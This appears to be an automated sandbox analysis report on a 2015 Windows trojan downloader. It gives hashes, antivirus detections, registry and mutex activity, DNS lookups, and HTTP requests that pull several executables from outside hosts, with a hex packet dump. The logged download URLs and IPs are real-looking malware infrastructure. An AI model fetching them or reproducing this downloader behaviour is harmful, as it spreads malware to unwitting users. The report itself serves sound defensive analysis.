Analysis Date2015-08-24 07:31:36
MD5997f4d96782ac3d53c2a2dded6a2aa1b
SHA1cd06d24804bf45c7e105ce2f782f310e57c9c12b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 2158731cac69d8eca392e58fce976548 sha1: d4c8b69f3a3d49a9ea631661227c84087202197b size: 333824
Section.rdata md5: 470a39f8b40b76bc0ccb3f42fe8ffa19 sha1: 1ee742d040022af98e759c94263cdfe0a70e4f22 size: 84992
Section.data md5: 735f8f5f5ccb763bf7084fc0507d5ed2 sha1: ad4f25de828ac81042f57f13c207c5c918e9fd57 size: 7168
Section.rsrc md5: eceffabc377cdcc2040cd8d67bd408a7 sha1: 6ba420fb9fd82842d49a3ccb1872a093398d4661 size: 210432
Section.reloc md5: 70b316357d66db6410394f508b35e1c9 sha1: 1194c7a1368c2a91f5375708af26b64a663f0b81 size: 15360
Timestamp2015-08-17 07:04:06
Pdb pathC:\Users\Administrator\Desktop\Q管\111\Release\nmjh.pdb
VersionLegalCopyright: Copyright (C) 2015
InternalName: YunBOWin.exe
FileVersion: 1.0.0.1
CompanyName: TODO: <Company name>
ProductName: TODO: <Product name>
ProductVersion: 1.0.0.1
FileDescription: TODO: <File description>
OriginalFilename: YunBOWin.exe
PackerMicrosoft Visual C++ ?.?
PEhash1819fde2f818f5fcb9864909b9ccbfeb1e3778c1
IMPhash2726688c611456a39742abadb71dadb0
AVRisingno_virus
AVMcafeeno_virus
AVAvira (antivir)TR/Dldr.Agent.741900
AVTwisterno_virus
AVAd-AwareGen:Variant.Kazy.550455
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVEset (nod32)Win32/TrojanDownloader.Agent.BQU
AVGrisoft (avg)Downloader.Generic14.AENM
AVSymantecno_virus
AVFortinetW32/Agent.BQU!tr.dldr
AVBitDefenderGen:Variant.Kazy.550455
AVK7Trojan-Downloader ( 004cd4381 )
AVMicrosoft Security EssentialsSoftwareBundler:Win32/Tupseg
AVMicroWorld (escan)Gen:Variant.Kazy.550455
AVMalwareBytesno_virus
AVAuthentiumW32/Downloader.DHWE-7263
AVFrisk (f-prot)no_virus
AVIkarusBackdoor.Win32.Zegost
AVEmsisoftGen:Variant.Kazy.550455
AVZillya!no_virus
AVKasperskyTrojan-Downloader.Win32.Generic
AVTrend Microno_virus
AVCAT (quickheal)no_virus
AVVirusBlokAda (vba32)no_virus
AVPadvishno_virus
AVBullGuardGen:Variant.Kazy.550455
AVArcabit (arcavir)Gen:Variant.Kazy.550455
AVCA (E-Trust Ino)no_virus
AVClamAVno_virus
AVDr. WebTrojan.DownLoader15.48501
AVF-SecureGen:Variant.Kazy.550455

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexYUBO_is_Running
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSr.photo.store.qq.com
Winsock DNSww4.sinaimg.cn
Winsock DNSww2.sinaimg.cn
Winsock DNSsoft.kunjun.org
Winsock DNSrawtj.photo.store.qq.com
Winsock DNSyunbo.cdgdyj.com
Winsock DNSww3.sinaimg.cn
Winsock DNSdown.360safe.com
Winsock DNSupdate.zchon.net
Winsock DNSd.juezhao123.com

Network Details:

DNSd.juezhao123.com
Type: A
58.222.24.189
DNSdown.qhcdn.com
Type: A
220.169.245.76
DNSdown.qhcdn.com
Type: A
101.226.161.206
DNSsoft.kunjun.org
Type: A
222.186.129.195
DNSn4cswhk3.gccdn.net
Type: A
174.35.56.225
DNSn4cswhk3.gccdn.net
Type: A
174.35.56.144
DNSn4cswhk3.gccdn.net
Type: A
174.35.56.144
DNSn4cswhk3.gccdn.net
Type: A
174.35.56.225
DNSna.b9.aicdn.com
Type: A
165.254.60.149
DNSna.b9.aicdn.com
Type: A
165.254.60.151
DNSna.b9.aicdn.com
Type: A
199.192.75.23
DNSna.b9.aicdn.com
Type: A
199.192.75.63
DNSna.b9.aicdn.com
Type: A
72.20.58.53
DNSna.b9.aicdn.com
Type: A
165.254.60.148
DNSr.photo.store.qq.com
Type: A
140.207.62.43
DNSr.photo.store.qq.com
Type: A
140.207.62.52
DNSr.photo.store.qq.com
Type: A
140.207.62.42
DNSn4cswhk3.gccdn.net
Type: A
174.35.56.144
DNSn4cswhk3.gccdn.net
Type: A
174.35.56.225
DNSrawtj.photo.store.qq.com
Type: A
123.151.71.111
DNSrawtj.photo.store.qq.com
Type: A
123.151.15.206
DNSupdate.zchon.net.w.kunlunar.com
Type: A
124.160.136.192
DNSupdate.zchon.net.w.kunlunar.com
Type: A
124.160.136.200
DNSupdate.zchon.net.w.kunlunar.com
Type: A
124.160.136.178
DNSupdate.zchon.net.w.kunlunar.com
Type: A
124.160.136.181
DNSdown.360safe.com
Type: A
DNSww3.sinaimg.cn
Type: A
DNSww4.sinaimg.cn
Type: A
DNSyunbo.cdgdyj.com
Type: A
DNSww2.sinaimg.cn
Type: A
DNSupdate.zchon.net
Type: A
HTTP GEThttp://d.juezhao123.com/setup/setup_30004.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://down.360safe.com/p/360se_nanaxt9.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://soft.kunjun.org:81/guding/QiJi_D10_1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ww3.sinaimg.cn/mw690/3e7a015cjw1euzm6zuvapg207s064he7.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ww4.sinaimg.cn/mw690/3e7a015cjw1ev207iv55vg2085064b2e.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://yunbo.cdgdyj.com/55a87135_1202000320.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://yunbo.cdgdyj.com/5590b2ba_1202000284.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://r.photo.store.qq.com/psb?/V10081EY2R2OYD/rL4e04R5Rsbp6FXCKaV.kuzmYsq*0nxw1TMkPUnbDKs!/r/dAW26W7gQwAA
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ww2.sinaimg.cn/mw690/3e7a015cjw1ev5li1x950g209d064he9.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ww4.sinaimg.cn/mw690/3e7a015cjw1ev1y2htunig20au064e83.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://yunbo.cdgdyj.com/install1179297.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ww4.sinaimg.cn/mw690/3e7a015cjw1euzn1g73wzg203n0471l1.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://rawtj.photo.store.qq.com/psb?/V11ocPuK4Lde3Q/Y9LhkCy.YrU1Fwb3a1Z.43ORPvUZc1ZQTpcXGuWkCvs!/r/dBwBAAAAAAAA
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://update.zchon.net/files/088.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://yunbo.cdgdyj.com/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 58.222.24.189:80
Flows TCP192.168.1.1:1033 ➝ 220.169.245.76:80
Flows TCP192.168.1.1:1034 ➝ 222.186.129.195:81
Flows TCP192.168.1.1:1035 ➝ 174.35.56.225:80
Flows TCP192.168.1.1:1036 ➝ 174.35.56.144:80
Flows TCP192.168.1.1:1037 ➝ 165.254.60.149:80
Flows TCP192.168.1.1:1038 ➝ 165.254.60.149:80
Flows TCP192.168.1.1:1039 ➝ 140.207.62.43:80
Flows TCP192.168.1.1:1040 ➝ 174.35.56.144:80
Flows TCP192.168.1.1:1041 ➝ 174.35.56.144:80
Flows TCP192.168.1.1:1042 ➝ 165.254.60.149:80
Flows TCP192.168.1.1:1043 ➝ 174.35.56.144:80
Flows TCP192.168.1.1:1044 ➝ 123.151.71.111:80
Flows TCP192.168.1.1:1045 ➝ 124.160.136.192:80
Flows TCP192.168.1.1:1046 ➝ 165.254.60.149:80

Raw Pcap
0x00000000 (00000)   47455420 2f736574 75702f73 65747570   GET /setup/setup
0x00000010 (00016)   5f333030 30342e65 78652048 5454502f   _30004.exe HTTP/
0x00000020 (00032)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x00000030 (00048)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x00000040 (00064)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x00000050 (00080)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000060 (00096)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000070 (00112)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000080 (00128)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000090 (00144)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x000000a0 (00160)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x000000b0 (00176)   20642e6a 75657a68 616f3132 332e636f    d.juezhao123.co
0x000000c0 (00192)   6d0d0a43 6f6e6e65 6374696f 6e3a204b   m..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f702f33 36307365 5f6e616e   GET /p/360se_nan
0x00000010 (00016)   61787439 2e657865 20485454 502f312e   axt9.exe HTTP/1.
0x00000020 (00032)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000030 (00048)   41636365 70742d45 6e636f64 696e673a   Accept-Encoding:
0x00000040 (00064)   20677a69 702c2064 65666c61 74650d0a    gzip, deflate..
0x00000050 (00080)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000060 (00096)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000070 (00112)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x00000080 (00128)   696e646f 7773204e 5420352e 313b2053   indows NT 5.1; S
0x00000090 (00144)   56313b20 2e4e4554 20434c52 20322e30   V1; .NET CLR 2.0
0x000000a0 (00160)   2e353037 3237290d 0a486f73 743a2064   .50727)..Host: d
0x000000b0 (00176)   6f776e2e 33363073 6166652e 636f6d0d   own.360safe.com.
0x000000c0 (00192)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x000000d0 (00208)   702d416c 6976650d 0a0d0a0d 0a         p-Alive......

0x00000000 (00000)   47455420 2f677564 696e672f 51694a69   GET /guding/QiJi
0x00000010 (00016)   5f443130 5f312e65 78652048 5454502f   _D10_1.exe HTTP/
0x00000020 (00032)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x00000030 (00048)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x00000040 (00064)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x00000050 (00080)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000060 (00096)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000070 (00112)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000080 (00128)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000090 (00144)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x000000a0 (00160)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x000000b0 (00176)   20736f66 742e6b75 6e6a756e 2e6f7267    soft.kunjun.org
0x000000c0 (00192)   3a38310d 0a436f6e 6e656374 696f6e3a   :81..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f6d7736 39302f33 65376130   GET /mw690/3e7a0
0x00000010 (00016)   3135636a 77316575 7a6d367a 75766170   15cjw1euzm6zuvap
0x00000020 (00032)   67323037 73303634 6865372e 67696620   g207s064he7.gif 
0x00000030 (00048)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000040 (00064)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000050 (00080)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000060 (00096)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000070 (00112)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000080 (00128)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000090 (00144)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x000000a0 (00160)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000b0 (00176)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000c0 (00192)   486f7374 3a207777 332e7369 6e61696d   Host: ww3.sinaim
0x000000d0 (00208)   672e636e 0d0a436f 6e6e6563 74696f6e   g.cn..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f6d7736 39302f33 65376130   GET /mw690/3e7a0
0x00000010 (00016)   3135636a 77316576 32303769 76353576   15cjw1ev207iv55v
0x00000020 (00032)   67323038 35303634 6232652e 67696620   g2085064b2e.gif 
0x00000030 (00048)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000040 (00064)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000050 (00080)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000060 (00096)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000070 (00112)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000080 (00128)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000090 (00144)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x000000a0 (00160)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000b0 (00176)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000c0 (00192)   486f7374 3a207777 342e7369 6e61696d   Host: ww4.sinaim
0x000000d0 (00208)   672e636e 0d0a436f 6e6e6563 74696f6e   g.cn..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f353561 38373133 355f3132   GET /55a87135_12
0x00000010 (00016)   30323030 30333230 2e657865 20485454   02000320.exe HTT
0x00000020 (00032)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000030 (00048)   2f2a0d0a 41636365 70742d45 6e636f64   /*..Accept-Encod
0x00000040 (00064)   696e673a 20677a69 702c2064 65666c61   ing: gzip, defla
0x00000050 (00080)   74650d0a 55736572 2d416765 6e743a20   te..User-Agent: 
0x00000060 (00096)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x00000070 (00112)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x00000080 (00128)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x00000090 (00144)   313b2053 56313b20 2e4e4554 20434c52   1; SV1; .NET CLR
0x000000a0 (00160)   20322e30 2e353037 3237290d 0a486f73    2.0.50727)..Hos
0x000000b0 (00176)   743a2079 756e626f 2e636467 64796a2e   t: yunbo.cdgdyj.
0x000000c0 (00192)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a6e    Keep-Alive....n
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f353539 30623262 615f3132   GET /5590b2ba_12
0x00000010 (00016)   30323030 30323834 2e657865 20485454   02000284.exe HTT
0x00000020 (00032)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000030 (00048)   2f2a0d0a 41636365 70742d45 6e636f64   /*..Accept-Encod
0x00000040 (00064)   696e673a 20677a69 702c2064 65666c61   ing: gzip, defla
0x00000050 (00080)   74650d0a 55736572 2d416765 6e743a20   te..User-Agent: 
0x00000060 (00096)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x00000070 (00112)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x00000080 (00128)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x00000090 (00144)   313b2053 56313b20 2e4e4554 20434c52   1; SV1; .NET CLR
0x000000a0 (00160)   20322e30 2e353037 3237290d 0a486f73    2.0.50727)..Hos
0x000000b0 (00176)   743a2079 756e626f 2e636467 64796a2e   t: yunbo.cdgdyj.
0x000000c0 (00192)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a6e    Keep-Alive....n
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f707362 3f2f5631 30303831   GET /psb?/V10081
0x00000010 (00016)   45593252 324f5944 2f724c34 65303452   EY2R2OYD/rL4e04R
0x00000020 (00032)   35527362 70364658 434b6156 2e6b757a   5Rsbp6FXCKaV.kuz
0x00000030 (00048)   6d597371 2a306e78 7731544d 6b50556e   mYsq*0nxw1TMkPUn
0x00000040 (00064)   62444b73 212f722f 64415732 36573767   bDKs!/r/dAW26W7g
0x00000050 (00080)   51774141 20485454 502f312e 310d0a41   QwAA HTTP/1.1..A
0x00000060 (00096)   63636570 743a202a 2f2a0d0a 41636365   ccept: */*..Acce
0x00000070 (00112)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000080 (00128)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000090 (00144)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x000000a0 (00160)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000b0 (00176)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000c0 (00192)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x000000d0 (00208)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000e0 (00224)   3237290d 0a486f73 743a2072 2e70686f   27)..Host: r.pho
0x000000f0 (00240)   746f2e73 746f7265 2e71712e 636f6d0d   to.store.qq.com.
0x00000100 (00256)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x00000110 (00272)   702d416c 6976650d 0a0d0a              p-Alive....

0x00000000 (00000)   47455420 2f6d7736 39302f33 65376130   GET /mw690/3e7a0
0x00000010 (00016)   3135636a 77316576 356c6931 78393530   15cjw1ev5li1x950
0x00000020 (00032)   67323039 64303634 6865392e 67696620   g209d064he9.gif 
0x00000030 (00048)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000040 (00064)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000050 (00080)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000060 (00096)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000070 (00112)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000080 (00128)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000090 (00144)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x000000a0 (00160)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000b0 (00176)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000c0 (00192)   486f7374 3a207777 322e7369 6e61696d   Host: ww2.sinaim
0x000000d0 (00208)   672e636e 0d0a436f 6e6e6563 74696f6e   g.cn..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)   746f2e73 746f7265 2e71712e 636f6d0d   to.store.qq.com.
0x00000100 (00256)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x00000110 (00272)   702d416c 6976650d 0a0d0a              p-Alive....

0x00000000 (00000)   47455420 2f6d7736 39302f33 65376130   GET /mw690/3e7a0
0x00000010 (00016)   3135636a 77316576 31793268 74756e69   15cjw1ev1y2htuni
0x00000020 (00032)   67323061 75303634 6538332e 67696620   g20au064e83.gif 
0x00000030 (00048)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000040 (00064)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000050 (00080)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000060 (00096)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000070 (00112)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000080 (00128)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000090 (00144)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x000000a0 (00160)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000b0 (00176)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000c0 (00192)   486f7374 3a207777 342e7369 6e61696d   Host: ww4.sinaim
0x000000d0 (00208)   672e636e 0d0a436f 6e6e6563 74696f6e   g.cn..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)   746f2e73 746f7265 2e71712e 636f6d0d   to.store.qq.com.
0x00000100 (00256)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x00000110 (00272)   702d416c 6976650d 0a0d0a              p-Alive....

0x00000000 (00000)   47455420 2f696e73 74616c6c 31313739   GET /install1179
0x00000010 (00016)   3239372e 65786520 48545450 2f312e31   297.exe HTTP/1.1
0x00000020 (00032)   0d0a4163 63657074 3a202a2f 2a0d0a41   ..Accept: */*..A
0x00000030 (00048)   63636570 742d456e 636f6469 6e673a20   ccept-Encoding: 
0x00000040 (00064)   677a6970 2c206465 666c6174 650d0a55   gzip, deflate..U
0x00000050 (00080)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000060 (00096)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000070 (00112)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000080 (00128)   6e646f77 73204e54 20352e31 3b205356   ndows NT 5.1; SV
0x00000090 (00144)   313b202e 4e455420 434c5220 322e302e   1; .NET CLR 2.0.
0x000000a0 (00160)   35303732 37290d0a 486f7374 3a207975   50727)..Host: yu
0x000000b0 (00176)   6e626f2e 63646764 796a2e63 6f6d0d0a   nbo.cdgdyj.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a6563 74696f6e   -Alive....ection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)   746f2e73 746f7265 2e71712e 636f6d0d   to.store.qq.com.
0x00000100 (00256)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x00000110 (00272)   702d416c 6976650d 0a0d0a              p-Alive....

0x00000000 (00000)   47455420 2f6d7736 39302f33 65376130   GET /mw690/3e7a0
0x00000010 (00016)   3135636a 77316575 7a6e3167 3733777a   15cjw1euzn1g73wz
0x00000020 (00032)   67323033 6e303437 316c312e 67696620   g203n0471l1.gif 
0x00000030 (00048)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000040 (00064)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000050 (00080)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000060 (00096)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000070 (00112)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000080 (00128)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000090 (00144)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x000000a0 (00160)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000b0 (00176)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000c0 (00192)   486f7374 3a207777 342e7369 6e61696d   Host: ww4.sinaim
0x000000d0 (00208)   672e636e 0d0a436f 6e6e6563 74696f6e   g.cn..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)   746f2e73 746f7265 2e71712e 636f6d0d   to.store.qq.com.
0x00000100 (00256)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x00000110 (00272)   702d416c 6976650d 0a0d0a              p-Alive....

0x00000000 (00000)   47455420 2f707362 3f2f5631 316f6350   GET /psb?/V11ocP
0x00000010 (00016)   754b344c 64653351 2f59394c 686b4379   uK4Lde3Q/Y9LhkCy
0x00000020 (00032)   2e597255 31467762 3361315a 2e34334f   .YrU1Fwb3a1Z.43O
0x00000030 (00048)   52507655 5a63315a 51547063 58477557   RPvUZc1ZQTpcXGuW
0x00000040 (00064)   6b437673 212f722f 64427742 41414141   kCvs!/r/dBwBAAAA
0x00000050 (00080)   41414141 20485454 502f312e 310d0a41   AAAA HTTP/1.1..A
0x00000060 (00096)   63636570 743a202a 2f2a0d0a 41636365   ccept: */*..Acce
0x00000070 (00112)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000080 (00128)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000090 (00144)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x000000a0 (00160)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000b0 (00176)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000c0 (00192)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x000000d0 (00208)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000e0 (00224)   3237290d 0a486f73 743a2072 6177746a   27)..Host: rawtj
0x000000f0 (00240)   2e70686f 746f2e73 746f7265 2e71712e   .photo.store.qq.
0x00000100 (00256)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f66696c 65732f30 38382e65   GET /files/088.e
0x00000010 (00016)   78652048 5454502f 312e310d 0a416363   xe HTTP/1.1..Acc
0x00000020 (00032)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000030 (00048)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000040 (00064)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x00000050 (00080)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000060 (00096)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000070 (00112)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000080 (00128)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000090 (00144)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000a0 (00160)   290d0a48 6f73743a 20757064 6174652e   )..Host: update.
0x000000b0 (00176)   7a63686f 6e2e6e65 740d0a43 6f6e6e65   zchon.net..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a434c52 20322e30 2e353037   e....CLR 2.0.507
0x000000e0 (00224)   3237290d 0a486f73 743a2072 6177746a   27)..Host: rawtj
0x000000f0 (00240)   2e70686f 746f2e73 746f7265 2e71712e   .photo.store.qq.
